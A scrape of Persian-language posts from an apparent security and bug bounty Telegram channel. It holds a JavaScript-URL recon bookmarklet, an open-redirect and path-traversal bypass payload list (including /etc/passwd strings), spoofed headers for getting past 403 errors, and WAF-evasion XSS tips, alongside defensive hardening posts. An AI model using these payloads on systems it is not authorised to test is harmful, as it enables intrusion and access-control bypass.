🔖 لیستی از مطالعه باگ بانتی : مجموعه ای منتخب از مقالات و منابع برای شکارچیان باگ بانتی .
https://bb.vitorfalcao.com/
@TryHackBox
#bugbounty #باگ_بانتی
https://bb.vitorfalcao.com/
@TryHackBox
#bugbounty #باگ_بانتی
❤13
This media is not supported in your browser
VIEW IN TELEGRAM
نکته #باگ_بانتی استخراج URLهای فایل های جاوااسکریپت از هر صفحه!
فراموش کن DevTools رو باز کنی از این بوکمارکت استفاده کن تا فوری همه URLهای فایل.js رو استخراج کنی و تو یه فایل.txt دانلودشون کنی.
چرا مهمه:
سریع همه فایلهای جاوااسکریپت لینک شده رو جمع کن
ازشون برای تحلیل استاتیک(LinkFinder، SecretFinder و غیره)استفاده کن
عالی برای recon،کشف endpoint و دور زدن احراز هویت
کد بوک مارکت:
چطور استفاده کن:
یه بوکمارکت جدید تو مرورگرت بساز.
کد بالا رو تو فیلد URL بچسبون.
به سایت هدف برو و بوکمارکت رو کلیک کن.
فایل javanoscript_urls.txt با همه لینکهای.js دانلود میشه.
حالا میتونی اینو به:
LinkFinder
SecretFinder
JSParser
یا تحلیل دستی بدی!
@TryHackBox
فراموش کن DevTools رو باز کنی از این بوکمارکت استفاده کن تا فوری همه URLهای فایل.js رو استخراج کنی و تو یه فایل.txt دانلودشون کنی.
چرا مهمه:
سریع همه فایلهای جاوااسکریپت لینک شده رو جمع کن
ازشون برای تحلیل استاتیک(LinkFinder، SecretFinder و غیره)استفاده کن
عالی برای recon،کشف endpoint و دور زدن احراز هویت
کد بوک مارکت:
javanoscript:(function(){let urls=[];document.querySelectorAll('*').forEach(e=>{urls.push(e.src,e.href,e.url)});urls=[...new Set(urls)].filter(u=>u&&u.endsWith('.js')).join('\n');let blob=new Blob([urls],{type:'text/plain'});let a=document.createElement('a');a.href=URL.createObjectURL(blob);a.download='javanoscript_urls.txt';a.click();})();چطور استفاده کن:
یه بوکمارکت جدید تو مرورگرت بساز.
کد بالا رو تو فیلد URL بچسبون.
به سایت هدف برو و بوکمارکت رو کلیک کن.
فایل javanoscript_urls.txt با همه لینکهای.js دانلود میشه.
حالا میتونی اینو به:
LinkFinder
SecretFinder
JSParser
یا تحلیل دستی بدی!
@TryHackBox
❤18👍2🔥2
🔖 میتونی این Bypass دستی مؤثر برای open redirect رو امتحان کنی
💢 ۱. تزریق Null-byte:
⦁ /google.com%00/
⦁ //google.com%00
💢 ۲. تغییرات(variations) انکودینگ Base64:
⦁ aHR0cDovL2dvb2dsZS5jb20=
⦁ aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
⦁ //base64:d3d3Lmdvb2dsZS5jb20=/
💢 ۳. تغییرات حساس به حروف کوچک/بزرگ:
⦁ //GOOGLE.com/
⦁ //GoOgLe.com/
💢 ۴. توالی های UTF-8 طولانی:
⦁ %C0%AE%C0%AE%2F (انکودینگ طولانی برای../)
⦁ %C0%AF%C0%AF%2F%2Fgoogle.com
💢 ۵. طرح های انکودینگ مخلوط:
⦁ /%68%74%74%70://google.com
⦁ //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
⦁ //base64:%2F%2Fgoogle.com/
💢 ۶. نوتاسیون های(notations) جایگزین دامنه:
⦁ //google.com@127.0.0.1/
⦁ //127.0.0.1.xip.io/
⦁ //0x7F000001/ (IP هگزادسیمال)
💢 ۷. کاراکترهای خاص Trailing:
⦁ //google.com/#/
⦁ //google.com/;&/
⦁ //google.com/?id=123&//
💢 ۸. فرمت آدرس IP اکتال( Octal ):
⦁ http://0177.0.0.1/
⦁ http://00177.0000.0000.0001/
💢 ۹. تغییرات آدرس IP:
⦁ http://3232235777 (نوتاسیون دسیمال IP)
⦁ http://0xC0A80001 (نوتاسیون هگز IP)
⦁ http://192.168.1.1/
💢 ۱۰. Path traversal با انکودینگ:
⦁ /..%252f..%252f..%252fetc/passwd
⦁ /%252e%252e/%252e%252e/%252e%252e/etc/passwd
⦁ /..%5c..%5c..%5cwindows/system32/cmd.exe
💢 ۱۱. گنجاندن پروتکل inclusion:
⦁ ftp://google.com/
⦁ javanoscript:alert(1)//google.com
💢 ۱۲. URLهای نسبی پروتکل:
-:////google.com/
-:///google.com/
💢 ۱۳. موارد لبه redirect:
⦁ //google.com/?q=//bing.com/
⦁ //google.com?q=https://another-site.com/
💢 ۱۴. نوتاسیون IPv6:
⦁ http://[::1]/
⦁ http://[::ffff:192.168.1.1]/
💢 ۱۵. انکودینگ دوگانه URL:
⦁ %252f%252fgoogle.com (دو بار انکود شده)
⦁ %255cgoogle.com
💢 ۱۶. ترکیب traversal و انکودینگ:
⦁ /%2E%2E/%2E%2E/etc/passwd
⦁ /%2e%2e%5c%2e%2e/etc/passwd
💢 ۱۷. مبتنی بر Reverse DNS:
⦁ https://google.com.reverselookup.com
⦁ //lookup-reversed.google.com/
💢 ۱۸. پورت های غیراستاندارد:
⦁ http://google.com:81/
⦁ https://google.com:444/
💢 ۱۹. پنهان سازی یونیکد در مسیرها:
⦁ /%E2%80%8Egoogle.com/
⦁ /%C2%A0google.com/
💢 ۲۰. پنهان سازی پارامترهای کوئری:
⦁ //google.com/?q=http://another-site.com/
⦁ //google.com/?redirect=https://google.com/
💢 ۲۱. استفاده از سمبل @ برای userinfo:
⦁ https://admin:password@google.com/
⦁ http://@google.com
💢 ۲۲. ترکیب userinfo و traversal:
⦁ https://admin:password@google.com/../../etc/passwd
@TryHackBox
#بایپس
💢 ۱. تزریق Null-byte:
⦁ /google.com%00/
⦁ //google.com%00
💢 ۲. تغییرات(variations) انکودینگ Base64:
⦁ aHR0cDovL2dvb2dsZS5jb20=
⦁ aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
⦁ //base64:d3d3Lmdvb2dsZS5jb20=/
💢 ۳. تغییرات حساس به حروف کوچک/بزرگ:
⦁ //GOOGLE.com/
⦁ //GoOgLe.com/
💢 ۴. توالی های UTF-8 طولانی:
⦁ %C0%AE%C0%AE%2F (انکودینگ طولانی برای../)
⦁ %C0%AF%C0%AF%2F%2Fgoogle.com
💢 ۵. طرح های انکودینگ مخلوط:
⦁ /%68%74%74%70://google.com
⦁ //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
⦁ //base64:%2F%2Fgoogle.com/
💢 ۶. نوتاسیون های(notations) جایگزین دامنه:
⦁ //google.com@127.0.0.1/
⦁ //127.0.0.1.xip.io/
⦁ //0x7F000001/ (IP هگزادسیمال)
💢 ۷. کاراکترهای خاص Trailing:
⦁ //google.com/#/
⦁ //google.com/;&/
⦁ //google.com/?id=123&//
💢 ۸. فرمت آدرس IP اکتال( Octal ):
⦁ http://0177.0.0.1/
⦁ http://00177.0000.0000.0001/
💢 ۹. تغییرات آدرس IP:
⦁ http://3232235777 (نوتاسیون دسیمال IP)
⦁ http://0xC0A80001 (نوتاسیون هگز IP)
⦁ http://192.168.1.1/
💢 ۱۰. Path traversal با انکودینگ:
⦁ /..%252f..%252f..%252fetc/passwd
⦁ /%252e%252e/%252e%252e/%252e%252e/etc/passwd
⦁ /..%5c..%5c..%5cwindows/system32/cmd.exe
💢 ۱۱. گنجاندن پروتکل inclusion:
⦁ ftp://google.com/
⦁ javanoscript:alert(1)//google.com
💢 ۱۲. URLهای نسبی پروتکل:
-:////google.com/
-:///google.com/
💢 ۱۳. موارد لبه redirect:
⦁ //google.com/?q=//bing.com/
⦁ //google.com?q=https://another-site.com/
💢 ۱۴. نوتاسیون IPv6:
⦁ http://[::1]/
⦁ http://[::ffff:192.168.1.1]/
💢 ۱۵. انکودینگ دوگانه URL:
⦁ %252f%252fgoogle.com (دو بار انکود شده)
⦁ %255cgoogle.com
💢 ۱۶. ترکیب traversal و انکودینگ:
⦁ /%2E%2E/%2E%2E/etc/passwd
⦁ /%2e%2e%5c%2e%2e/etc/passwd
💢 ۱۷. مبتنی بر Reverse DNS:
⦁ https://google.com.reverselookup.com
⦁ //lookup-reversed.google.com/
💢 ۱۸. پورت های غیراستاندارد:
⦁ http://google.com:81/
⦁ https://google.com:444/
💢 ۱۹. پنهان سازی یونیکد در مسیرها:
⦁ /%E2%80%8Egoogle.com/
⦁ /%C2%A0google.com/
💢 ۲۰. پنهان سازی پارامترهای کوئری:
⦁ //google.com/?q=http://another-site.com/
⦁ //google.com/?redirect=https://google.com/
💢 ۲۱. استفاده از سمبل @ برای userinfo:
⦁ https://admin:password@google.com/
⦁ http://@google.com
💢 ۲۲. ترکیب userinfo و traversal:
⦁ https://admin:password@google.com/../../etc/passwd
@TryHackBox
#بایپس
Another Site
Home - Another Site
Embrace Life’s Journey with Us About Read About Travel Embark on a journey of discovery with our travel content, where every destination is a story waiting to be told. From the sun-kissed shores of exotic beaches to the charming cobblestone streets of historic…
👍12
🔖 لیست تکنیک های شناسایی (recon) که تقریباً هیچ کسی امتحان نمیکنه
• اجرای CeWL روی product & API docs
• شمارش VHost و Bruteforcing با هدر هاست تنظیم شده روی "localhost"
• بروت فورس با متدهای HTTP مختلف (POST, PUT, PATCH, ...)
• شناسایی از روی Favicon
• کراولینگ سایت ها با هدرهای user-agent مختلف
@TryHackBox
#باگ_بانتی #شناسایی
• اجرای CeWL روی product & API docs
• شمارش VHost و Bruteforcing با هدر هاست تنظیم شده روی "localhost"
• بروت فورس با متدهای HTTP مختلف (POST, PUT, PATCH, ...)
• شناسایی از روی Favicon
• کراولینگ سایت ها با هدرهای user-agent مختلف
@TryHackBox
#باگ_بانتی #شناسایی
👍10❤2
🟥 بسیاری از نفوذهای موفق به شبکههای ویندوزی، نه به دلیل باگهای نرمافزاری، بلکه به دلیل پیکربندیهای ضعیف و اشتباه در سرویس Active Directory رخ میدهند.
🟦کلید اصلی امنیت، غیرفعال کردن پروتکلهای قدیمی و ناامن
(مانند NTLM و LLMNR)
🟩اعمال اصل "کمترین دسترسی" یا همان "Least Privilege" در سخت افزار ها و انجام ممیزی و بازبینی منظم تنظیمات و مجوزها است.
✍️نویسنده
@TryHackBox | The Chaos
#Active_Directory #AD #Windows #CyberSecurity
🟦کلید اصلی امنیت، غیرفعال کردن پروتکلهای قدیمی و ناامن
(مانند NTLM و LLMNR)
🟩اعمال اصل "کمترین دسترسی" یا همان "Least Privilege" در سخت افزار ها و انجام ممیزی و بازبینی منظم تنظیمات و مجوزها است.
✍️نویسنده
@TryHackBox | The Chaos
#Active_Directory #AD #Windows #CyberSecurity
❤8👍2
سلب مسئولیت TryHackBox.pdf
679.7 KB
💢 این سلب مسئولیت شامل تمام آموزش ها، راهنماها و به طور کلی تمام محتوای منتشر شده توسط نویسنده ها در این کانال می شود.
این کانال فقط برای اهداف آموزشی و پیشگیرانه است و در هیچ شرایطی به تشویق به نقض قوانین نمی پردازد. به درخواستهایی که قوانین ایران را نقض میکنند پاسخی داده نخواهد شد. علاوه بر این، شما به تنهایی مسئول اقدامات و استفادههای خود از مطالب ارائه شده در این کانال خواهید بود. نه نویسنده و نه میزبان او نمی توانند مسئول اقدامات شما، هر نوع که باشد، باشند.
@TryHackBox
#سلب_مسئولیت
این کانال فقط برای اهداف آموزشی و پیشگیرانه است و در هیچ شرایطی به تشویق به نقض قوانین نمی پردازد. به درخواستهایی که قوانین ایران را نقض میکنند پاسخی داده نخواهد شد. علاوه بر این، شما به تنهایی مسئول اقدامات و استفادههای خود از مطالب ارائه شده در این کانال خواهید بود. نه نویسنده و نه میزبان او نمی توانند مسئول اقدامات شما، هر نوع که باشد، باشند.
@TryHackBox
#سلب_مسئولیت
❤11👍3🕊1
🔖 در تلاش برای بایپس WAF و تزریق پیلود XSS، تگ <details> را فراموش نکنید. اغلب توسط WAF مسدود نمیشود!
@TryHackBox
#باگ_بانتی #نکته
@TryHackBox
#باگ_بانتی #نکته
👍14❤2👎1
🔖 از این هدرهای درخواست برای عبور از خطای 403 Forbidden استفاده کنید
@TryHackBox
#باگ_بانتی #نکته
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1 X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
@TryHackBox
#باگ_بانتی #نکته
👍13🔥5
نقشه ذهنی (MindMap) آرتیفکت های DFIR #ویندوز مجموعه ای از آرتیفکتها که در هنگام اجرای عملیات دیجیتال فارنزیک و پاسخ به رویدادهای امنیتی (DFIR) در سیستم های ویندوز، باید مورد توجه قرار گیرند.
@TryHackBox
#پاسخ_به_حادثه #dfir
@TryHackBox
#پاسخ_به_حادثه #dfir
👍5
فزونههای مرورگر میتوانند نقطه ضعف امنیتی بزرگی باشند و توسعهدهندگان باید:
اصل "کمترین دسترسی" را رعایت کنند
از انتقال و ذخیرهسازی ناامن دادهها جلوگیری کنند
در برابر تزریق کد و XSS محافظت کنند
وابستگیهای شخص ثالث امن را مدیریت کنند
شفافیت کامل در مورد جمعآوری داده داشته باشند
این راهنماییها برای توسعهدهندگان افزونه و همچنین کاربرانی که میخواهند افزونههای امنتری انتخاب کنند، بسیار مفید است.
✍️نویسنده
@TryHackBox | The Chaos
اصل "کمترین دسترسی" را رعایت کنند
از انتقال و ذخیرهسازی ناامن دادهها جلوگیری کنند
در برابر تزریق کد و XSS محافظت کنند
وابستگیهای شخص ثالث امن را مدیریت کنند
شفافیت کامل در مورد جمعآوری داده داشته باشند
این راهنماییها برای توسعهدهندگان افزونه و همچنین کاربرانی که میخواهند افزونههای امنتری انتخاب کنند، بسیار مفید است.
✍️نویسنده
@TryHackBox | The Chaos
❤5👏1
OWASP TOP 10 2025.pdf
3.6 MB
📖 OWASP Top 10 (2025)
🔖 10 آسیبپذیری (ریسک) رایج و مهم در برنامههای تحتوب
@TryHackBox
#آسیب_پذیری #Owasp
🔖 10 آسیبپذیری (ریسک) رایج و مهم در برنامههای تحتوب
- A01:2025 Broken Access Control
- A02:2025 Security Misconfiguration
- A03:2025 Software Supply Chain Failures
- A04:2025 Cryptographic Failures
- A05:2025 Injection
- A06:2025 Insecure Design
- A07:2025 Authentication Failures
- A08:2025 Software or Data Integrity Failures
- A09:2025 Logging & Alerting Failures
- A10:2025 Mishandling of Exceptional Conditions
@TryHackBox
#آسیب_پذیری #Owasp
👍11❤1
🔊 جهت گسترش بخش آموزشی، از افرادی که علاقه و توانایی در تولید محتوای منظم دارند دعوت میشود برای همکاری همراه شوند.
اگر مایل به مشارکت هستید، جهت هماهنگی پیام دهید:
📩 @THBxSupport
اگر مایل به مشارکت هستید، جهت هماهنگی پیام دهید:
📩 @THBxSupport
🐧 چگونه از طریق CLI بررسی کنیم که پورتی در لینوکس/یونیکس استفاده میشود یا خیر
مهم نیست برای چه هدفی به این اطلاعات نیاز دارید شناسایی نفوذ یا بررسی اینکه کدام سرویس روی کدام پورت گوش میدهد، دستور مربوطه همیشه باید در دسترس باشد.
در اینجا چند روش آمده است :
#لینوکس
@TryHackBox
مهم نیست برای چه هدفی به این اطلاعات نیاز دارید شناسایی نفوذ یا بررسی اینکه کدام سرویس روی کدام پورت گوش میدهد، دستور مربوطه همیشه باید در دسترس باشد.
در اینجا چند روش آمده است :
$ sudo lsof -i -P -n | grep LISTEN
$ sudo netstat -tulpn | grep LISTEN
$ sudo ss -tulpn | grep LISTEN
$ sudo lsof -i:22
$ sudo nmap -sTU -O IP-address
#لینوکس
@TryHackBox
❤7👍1
🎙 قسمت اول RadioZeroPod منتشر شد!
در این اپیزود رفتیم سراغ یکی از واقعیترین و جنجالیترین پروندههای دنیای هک
هکری به نام Pompompurin که اسمش سالها تو گزارشهای امنیت سایبری تکرار میشد.
سراغ تحلیل کامل OSINT و Threat Intelligence رفتیم و لایهلایه داستانش رو باز کردیم…
🎧 این قسمت رو از اینجا ببینید:
https://youtu.be/lAehXOe5tew
#RadioZeroPod
در این اپیزود رفتیم سراغ یکی از واقعیترین و جنجالیترین پروندههای دنیای هک
هکری به نام Pompompurin که اسمش سالها تو گزارشهای امنیت سایبری تکرار میشد.
سراغ تحلیل کامل OSINT و Threat Intelligence رفتیم و لایهلایه داستانش رو باز کردیم…
🎧 این قسمت رو از اینجا ببینید:
https://youtu.be/lAehXOe5tew
#RadioZeroPod
👍7
🔐 HTTP -> HTTPS
اگر شما یک سرویس داخلی HTTPS دارید، اما لود بالانسر گیتوی ورودی یا چیزی مشابه فقط آدرسهای HTTP را اجازه میدهد، میتوانید این را با یک فرمان ساده socat دور بزنید. این یک راهحل بلندمدت نیست، بلکه یک کیس سریع و موقتی است.
@TryHackBox
#نکتهها #ابزارها
اگر شما یک سرویس داخلی HTTPS دارید، اما لود بالانسر گیتوی ورودی یا چیزی مشابه فقط آدرسهای HTTP را اجازه میدهد، میتوانید این را با یک فرمان ساده socat دور بزنید. این یک راهحل بلندمدت نیست، بلکه یک کیس سریع و موقتی است.
@TryHackBox
#نکتهها #ابزارها
👍4❤2